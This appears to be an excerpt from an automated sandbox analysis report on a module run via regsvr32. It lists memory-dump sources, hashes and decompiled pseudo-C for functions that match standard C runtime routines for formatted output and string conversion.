                                    Function 000007FEF9D3B580 Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 318COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$_invalid_parameter$UpdateUpdate::~_
                                    • String ID: ( (_Stream->_flag & _IOSTRG) || ( fn = _fileno(_Stream), ( (_textmode_safe(fn) == __IOINFO_TM_ANSI) && !_tm_unicode_safe(fn))))$("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 4023976971-2293733425
                                    • Opcode ID: 2e8f2817575abf17236a5f031f9d249ff9066c6c73ed3770e2a1ff63e1bea630
                                    • Instruction ID: 2efa9e2c76ac9a5207add94b1133c9cb1d9f002e85ba24f4cd28f4c384247538
                                    • Opcode Fuzzy Hash: 2e8f2817575abf17236a5f031f9d249ff9066c6c73ed3770e2a1ff63e1bea630
                                    • Instruction Fuzzy Hash: 62023B72A0D7C28AE7B09B24E8447AEB7E4F380349F604125D6DC46AA9DB7EE545CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D35EA0 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 256COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                    • String ID: _mbstowcs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$s != NULL
                                    • API String ID: 530996419-3695252689
                                    • Opcode ID: fa484580cb52892c02ff67f95a17d1b2129cff6d1ab00e5c74c45926566419d1
                                    • Instruction ID: 5e2c1cfd74ac96a9b2e41df821e9bd095c4032b9a62c445e43c495128706d0cc
                                    • Opcode Fuzzy Hash: fa484580cb52892c02ff67f95a17d1b2129cff6d1ab00e5c74c45926566419d1
                                    • Instruction Fuzzy Hash: E2D11832A1CBC585E7A09B15E8407AEB7A0F784794F605626E6DE83BE9DF3DD444CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3B090 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 219COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: "$"$("Buffer too small", 0)$_wctomb_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wctomb.c$sizeInBytes <= INT_MAX$sizeInBytes > 0
                                    • API String ID: 2192614184-1854130327
                                    • Opcode ID: 0349e1f67bcf58a9467b2163a48374e143b216b4fcd3e10d2347f4427f3577c7
                                    • Instruction ID: 857da3831ea488476c5fe61a9777edcdb3204cdfae2c6516af70c38e8266575f
                                    • Opcode Fuzzy Hash: 0349e1f67bcf58a9467b2163a48374e143b216b4fcd3e10d2347f4427f3577c7
                                    • Instruction Fuzzy Hash: 97C1F932A0D68286E7B09B55E8547BEB7E0F784344F604126E6CD87AE9CB7EE444CF41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3D830 Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 225COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2192614184-1870338870
                                    • Opcode ID: 677b85930a9a5e10114940793937fb41496cbdaf58dc4485b8ee00e4ca785de0
                                    • Instruction ID: 99087f23451225b4f7ab5820d3e4ac0e5e7a5016f389c9197bb40e17ebc05c44
                                    • Opcode Fuzzy Hash: 677b85930a9a5e10114940793937fb41496cbdaf58dc4485b8ee00e4ca785de0
                                    • Instruction Fuzzy Hash: 4ED11972A0CAC28AE7B09F64E8447AEB6E0F380349F604125D6CD47AE9DB7ED545CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3C6D6 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 332COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 19%
                                    			E000007FE7FEF9D3C6D6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
				signed int _t223;
				signed char _t228;
				intOrPtr _t263;
				signed int _t338;
				signed int _t339;
				signed long long _t342;
				intOrPtr* _t365;
				signed long long _t390;

				_t338 = __rax;
				_a80 = _a80 | 0x00000040;
				_a72 = 0xa;
				_a72 = 0xa;
				_a116 = 0x10;
				asm("bts eax, 0xf");
				_a708 = 7;
				_a708 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
				_a84 = 0x30;
				_a85 = _a708 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t338;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t338;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
				_t339 = E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t339;
				goto 0xf9d3c80e;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t339;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t339;
				goto 0xf9d3c84b;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t339;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
				if (_a824 >= 0) goto 0xf9d3c882;
				_a832 =  ~_a824;
				asm("bts eax, 0x8");
				goto 0xf9d3c892;
				_t342 = _a824;
				_a832 = _t342;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
				_a832 = _a832 & _t342;
				if (_a116 >= 0) goto 0xf9d3c8d8;
				_a116 = 1;
				goto 0xf9d3c8f5;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
				_a116 = 0x200;
				if (_a832 != 0) goto 0xf9d3c908;
				_a92 = 0;
				_a64 =  &_a687;
				_t223 = _a116;
				_a116 = _a116 - 1;
				if (_t223 > 0) goto 0xf9d3c936;
				if (_a832 == 0) goto 0xf9d3c9d3;
				_a1040 = _a72;
				_a816 = _t223 / _a1040 + 0x30;
				_a1048 = _a72;
				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
				_t228 = _a816 + _a708;
				_a816 = _t228;
				 *_a64 = _a816 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0xf9d3c915;
				_a104 = _t228;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
				if (_a104 == 0) goto 0xf9d3ca12;
				if ( *_a64 == 0x30) goto 0xf9d3ca31;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
				_a84 = 0x20;
				_a92 = 1;
				_a840 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
				if (_a76 == 0) goto 0xf9d3cc1d;
				if (_a104 <= 0) goto 0xf9d3cc1d;
				_a872 = 0;
				_a848 = _a64;
				_a856 = _a104;
				_a856 = _a856 - 1;
				if (_a856 == 0) goto 0xf9d3cc1b;
				_a1056 =  *_a848 & 0x0000ffff;
				r9d = _a1056 & 0x0000ffff;
				r8d = 6;
				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
				_a848 =  &(_a848[1]);
				if (_a872 != 0) goto 0xf9d3cbe5;
				if (_a860 != 0) goto 0xf9d3cbf2;
				_a688 = 0xffffffff;
				goto 0xf9d3cc1b;
				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
				goto 0xf9d3cb60;
				goto 0xf9d3cc3b;
				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
				if (_a688 < 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				if (_a96 == 0) goto 0xf9d3cc8e;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3b99c;
				if (_a704 == 0) goto 0xf9d3ccb4;
				if (_a704 == 7) goto 0xf9d3ccb4;
				_a1060 = 0;
				goto 0xf9d3ccbf;
				_a1060 = 1;
				_t263 = _a1060;
				_a876 = _t263;
				if (_a876 != 0) goto 0xf9d3cd05;
				_t365 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t365;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t263 != 1) goto 0xf9d3cd05;
				asm("int3");
				if (_a876 != 0) goto 0xf9d3cd61;
				0xf9d2ab30();
				 *_t365 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a912 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3cd80;
				_a916 = _a688;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t390, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}











                                    0x7fef9d3c6d6
                                    0x7fef9d3c6dd
                                    0x7fef9d3c6e1
                                    0x7fef9d3c6ee
                                    0x7fef9d3c6f8
                                    0x7fef9d3c704
                                    0x7fef9d3c70c
                                    0x7fef9d3c719
                                    0x7fef9d3c724
                                    0x7fef9d3c737
                                    0x7fef9d3c739
                                    0x7fef9d3c748
                                    0x7fef9d3c74c
                                    0x7fef9d3c756
                                    0x7fef9d3c769
                                    0x7fef9d3c76f
                                    0x7fef9d3c782
                                    0x7fef9d3c78c
                                    0x7fef9d3c791
                                    0x7fef9d3c799
                                    0x7fef9d3c7a9
                                    0x7fef9d3c7b3
                                    0x7fef9d3c7b8
                                    0x7fef9d3c7c0
                                    0x7fef9d3c7ce
                                    0x7fef9d3c7d9
                                    0x7fef9d3c7e8
                                    0x7fef9d3c7ec
                                    0x7fef9d3c7f4
                                    0x7fef9d3c7fe
                                    0x7fef9d3c806
                                    0x7fef9d3c80e
                                    0x7fef9d3c819
                                    0x7fef9d3c823
                                    0x7fef9d3c82a
                                    0x7fef9d3c832
                                    0x7fef9d3c83c
                                    0x7fef9d3c843
                                    0x7fef9d3c854
                                    0x7fef9d3c85f
                                    0x7fef9d3c86c
                                    0x7fef9d3c878
                                    0x7fef9d3c880
                                    0x7fef9d3c882
                                    0x7fef9d3c88a
                                    0x7fef9d3c89d
                                    0x7fef9d3c8aa
                                    0x7fef9d3c8bf
                                    0x7fef9d3c8cc
                                    0x7fef9d3c8ce
                                    0x7fef9d3c8d6
                                    0x7fef9d3c8df
                                    0x7fef9d3c8eb
                                    0x7fef9d3c8ed
                                    0x7fef9d3c8fe
                                    0x7fef9d3c900
                                    0x7fef9d3c910
                                    0x7fef9d3c915
                                    0x7fef9d3c91f
                                    0x7fef9d3c925
                                    0x7fef9d3c930
                                    0x7fef9d3c93b
                                    0x7fef9d3c95e
                                    0x7fef9d3c96a
                                    0x7fef9d3c997
                                    0x7fef9d3c9a9
                                    0x7fef9d3c9ab
                                    0x7fef9d3c9bf
                                    0x7fef9d3c9c9
                                    0x7fef9d3c9ce
                                    0x7fef9d3c9e0
                                    0x7fef9d3c9ec
                                    0x7fef9d3c9fc
                                    0x7fef9d3ca03
                                    0x7fef9d3ca10
                                    0x7fef9d3ca1a
                                    0x7fef9d3ca24
                                    0x7fef9d3ca2d
                                    0x7fef9d3ca36
                                    0x7fef9d3ca45
                                    0x7fef9d3ca52
                                    0x7fef9d3ca54
                                    0x7fef9d3ca59
                                    0x7fef9d3ca61
                                    0x7fef9d3ca6c
                                    0x7fef9d3ca6e
                                    0x7fef9d3ca73
                                    0x7fef9d3ca7b
                                    0x7fef9d3ca86
                                    0x7fef9d3ca88
                                    0x7fef9d3ca8d
                                    0x7fef9d3caa5
                                    0x7fef9d3cab5
                                    0x7fef9d3cad0
                                    0x7fef9d3caee
                                    0x7fef9d3cafc
                                    0x7fef9d3cb07
                                    0x7fef9d3cb22
                                    0x7fef9d3cb2c
                                    0x7fef9d3cb37
                                    0x7fef9d3cb3d
                                    0x7fef9d3cb4d
                                    0x7fef9d3cb59
                                    0x7fef9d3cb70
                                    0x7fef9d3cb79
                                    0x7fef9d3cb8a
                                    0x7fef9d3cb92
                                    0x7fef9d3cb9b
                                    0x7fef9d3cbb6
                                    0x7fef9d3cbc9
                                    0x7fef9d3cbd9
                                    0x7fef9d3cbe3
                                    0x7fef9d3cbe5
                                    0x7fef9d3cbf0
                                    0x7fef9d3cc11
                                    0x7fef9d3cc16
                                    0x7fef9d3cc1b
                                    0x7fef9d3cc36
                                    0x7fef9d3cc43
                                    0x7fef9d3cc4e
                                    0x7fef9d3cc69
                                    0x7fef9d3cc74
                                    0x7fef9d3cc80
                                    0x7fef9d3cc85
                                    0x7fef9d3cc8e
                                    0x7fef9d3cc9b
                                    0x7fef9d3cca5
                                    0x7fef9d3cca7
                                    0x7fef9d3ccb2
                                    0x7fef9d3ccb4
                                    0x7fef9d3ccbf
                                    0x7fef9d3ccc6
                                    0x7fef9d3ccd5
                                    0x7fef9d3ccd7
                                    0x7fef9d3ccde
                                    0x7fef9d3cce3
                                    0x7fef9d3cce6
                                    0x7fef9d3ccf8
                                    0x7fef9d3cd00
                                    0x7fef9d3cd02
                                    0x7fef9d3cd0d
                                    0x7fef9d3cd0f
                                    0x7fef9d3cd14
                                    0x7fef9d3cd1a
                                    0x7fef9d3cd23
                                    0x7fef9d3cd3e
                                    0x7fef9d3cd43
                                    0x7fef9d3cd53
                                    0x7fef9d3cd5f
                                    0x7fef9d3cd68
                                    0x7fef9d3cd74
                                    0x7fef9d3cd97

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: get_int64_arg$wctomb_s
                                    • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2984758162-268265396
                                    • Opcode ID: 61945b808d8ddeeab049de188114ad7d55d89a3558f0f9168201042d10a77149
                                    • Instruction ID: 3d46b7cc479ec5e1b64121366563b1e191facb976c601abf34f32c88bb47aca1
                                    • Opcode Fuzzy Hash: 61945b808d8ddeeab049de188114ad7d55d89a3558f0f9168201042d10a77149
                                    • Instruction Fuzzy Hash: 8202ED7260CBC186E7B1CB25E8857AEB7E4F384795F200125EACD86AA9DB7DD540CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D363E0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 260COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: "$(pwcs == NULL && sizeInWords == 0) || (pwcs != NULL && sizeInWords > 0)$P$_mbstowcs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$retsize <= sizeInWords
                                    • API String ID: 2192614184-660564692
                                    • Opcode ID: 51ea2d8a29ec6a42f4206cddb2a15a761283d0351a467ffd0ee92275139e1829
                                    • Instruction ID: 0047506df9643dfb2240c3b63e02d4c6faf0d454733b2a9523d16aca39b446dd
                                    • Opcode Fuzzy Hash: 51ea2d8a29ec6a42f4206cddb2a15a761283d0351a467ffd0ee92275139e1829
                                    • Instruction Fuzzy Hash: E5E10B32A0DBC685E7B09B14E8457AEA3E0F384794FA04625D6DD53AE8DF7ED484CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D355F0 Relevance: 24.2, APIs: 16, Instructions: 206COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 57%
                                    			E000007FE7FEF9D355F0(void* __ecx, long long __rcx, long long __rdx, signed int* __r8, signed int* __r9, long long _a8, void* _a16, signed int* _a24, signed int* _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				void* _v64;
				long long _v72;
				void* _t88;
				void* _t89;
				void* _t107;
				void* _t109;
				signed int* _t158;
				signed int* _t160;
				long long _t175;
				long long _t186;
				signed int* _t187;
				signed int* _t193;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v72 = 0;
				_t158 = _a24;
				if ( *((intOrPtr*)(_t158 + 4)) == 0) goto 0xf9d35639;
				_t89 = E000007FE7FEF9D2E680(_t88, _t158);
				_v56 = _t158 + _a24[1];
				goto 0xf9d35642;
				_v56 = 0;
				if (_v56 == 0) goto 0xf9d356aa;
				_t160 = _a24;
				if ( *((intOrPtr*)(_t160 + 4)) == 0) goto 0xf9d35673;
				E000007FE7FEF9D2E680(_t89, _t160);
				_v48 = _t160 + _a24[1];
				goto 0xf9d3567c;
				_v48 = 0;
				if ( *((char*)(_v48 + 0x10)) == 0) goto 0xf9d356aa;
				if (_a24[2] != 0) goto 0xf9d356b1;
				if (( *_a24 & 0x80000000) != 0) goto 0xf9d356b1;
				goto 0xf9d35966;
				if (( *_a24 & 0x80000000) == 0) goto 0xf9d356d0;
				_v64 = _a16;
				goto 0xf9d356e9;
				_v64 = _a24[2] +  *_a16;
				if (( *_a24 & 0x00000008) == 0) goto 0xf9d35765;
				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d3575b;
				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d3575b;
				 *_v64 =  *((intOrPtr*)(_a8 + 0x28));
				_t175 = _v64;
				E000007FE7FEF9D35B30(_t100,  *_t175,  &(_a32[2]));
				 *_v64 = _t175;
				goto 0xf9d35760;
				E000007FE7FEF9D2CF80(_t175);
				goto 0xf9d3595a;
				if (( *_a32 & 0x00000001) == 0) goto 0xf9d35813;
				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35809;
				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35809;
				_t107 = E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64,  *((intOrPtr*)(_a8 + 0x28)), _a32[5]);
				if (_a32[5] != 8) goto 0xf9d35807;
				if ( *_v64 == 0) goto 0xf9d35807;
				_t186 = _v64;
				E000007FE7FEF9D35B30(_t107,  *_t186,  &(_a32[2]));
				 *_v64 = _t186;
				goto 0xf9d3580e;
				_t109 = E000007FE7FEF9D2CF80(_t186);
				goto 0xf9d3595a;
				_t187 = _a32;
				if ( *((intOrPtr*)(_t187 + 0x18)) == 0) goto 0xf9d3583c;
				E000007FE7FEF9D2E6A0(_t109, _t187);
				_v40 = _t187 + _a32[6];
				goto 0xf9d35845;
				_v40 = 0;
				if (_v40 != 0) goto 0xf9d358c6;
				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d358bc;
				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d358bc;
				_t191 = _a32[5];
				_v32 = _a32[5];
				E000007FE7FEF9D35B30(_t112,  *((intOrPtr*)(_a8 + 0x28)),  &(_a32[2]));
				E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64, _a32[5], _v32);
				goto 0xf9d358c1;
				E000007FE7FEF9D2CF80(_t191);
				goto 0xf9d3595a;
				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35955;
				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35955;
				_t193 = _a32;
				if ( *((intOrPtr*)(_t193 + 0x18)) == 0) goto 0xf9d35919;
				E000007FE7FEF9D2E6A0(_t117, _t193);
				_v24 = _t193 + _a32[6];
				goto 0xf9d35922;
				_v24 = 0;
				if (E000007FE7FEF9D3D2F0(_v24) == 0) goto 0xf9d35955;
				_t195 = _a32;
				if (( *_a32 & 0x00000004) == 0) goto 0xf9d3594b;
				_v72 = 2;
				goto 0xf9d35953;
				_v72 = 1;
				goto 0xf9d3595a;
				E000007FE7FEF9D2CF80(_a32);
				E000007FE7FEF9D2CF50(_t195);
				return _v72;
			}




















                                    0x7fef9d355f0
                                    0x7fef9d355f5
                                    0x7fef9d355fa
                                    0x7fef9d355ff
                                    0x7fef9d35608
                                    0x7fef9d35610
                                    0x7fef9d3561c
                                    0x7fef9d3561e
                                    0x7fef9d35632
                                    0x7fef9d35637
                                    0x7fef9d35639
                                    0x7fef9d35648
                                    0x7fef9d3564a
                                    0x7fef9d35656
                                    0x7fef9d35658
                                    0x7fef9d3566c
                                    0x7fef9d35671
                                    0x7fef9d35673
                                    0x7fef9d35687
                                    0x7fef9d35695
                                    0x7fef9d356a8
                                    0x7fef9d356ac
                                    0x7fef9d356c2
                                    0x7fef9d356c9
                                    0x7fef9d356ce
                                    0x7fef9d356e4
                                    0x7fef9d356f8
                                    0x7fef9d3570f
                                    0x7fef9d35722
                                    0x7fef9d35732
                                    0x7fef9d35744
                                    0x7fef9d3574c
                                    0x7fef9d35756
                                    0x7fef9d35759
                                    0x7fef9d3575b
                                    0x7fef9d35760
                                    0x7fef9d35774
                                    0x7fef9d3578f
                                    0x7fef9d357a2
                                    0x7fef9d357c1
                                    0x7fef9d357d6
                                    0x7fef9d357e1
                                    0x7fef9d357f2
                                    0x7fef9d357fa
                                    0x7fef9d35804
                                    0x7fef9d35807
                                    0x7fef9d35809
                                    0x7fef9d3580e
                                    0x7fef9d35813
                                    0x7fef9d3581f
                                    0x7fef9d35821
                                    0x7fef9d35835
                                    0x7fef9d3583a
                                    0x7fef9d3583c
                                    0x7fef9d3584b
                                    0x7fef9d35862
                                    0x7fef9d35875
                                    0x7fef9d3587f
                                    0x7fef9d35883
                                    0x7fef9d358a0
                                    0x7fef9d358b5
                                    0x7fef9d358ba
                                    0x7fef9d358bc
                                    0x7fef9d358c1
                                    0x7fef9d358db
                                    0x7fef9d358ee
                                    0x7fef9d358f0
                                    0x7fef9d358fc
                                    0x7fef9d358fe
                                    0x7fef9d35912
                                    0x7fef9d35917
                                    0x7fef9d35919
                                    0x7fef9d3592e
                                    0x7fef9d35930
                                    0x7fef9d3593f
                                    0x7fef9d35941
                                    0x7fef9d35949
                                    0x7fef9d3594b
                                    0x7fef9d35953
                                    0x7fef9d35955
                                    0x7fef9d3595c
                                    0x7fef9d3596a

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
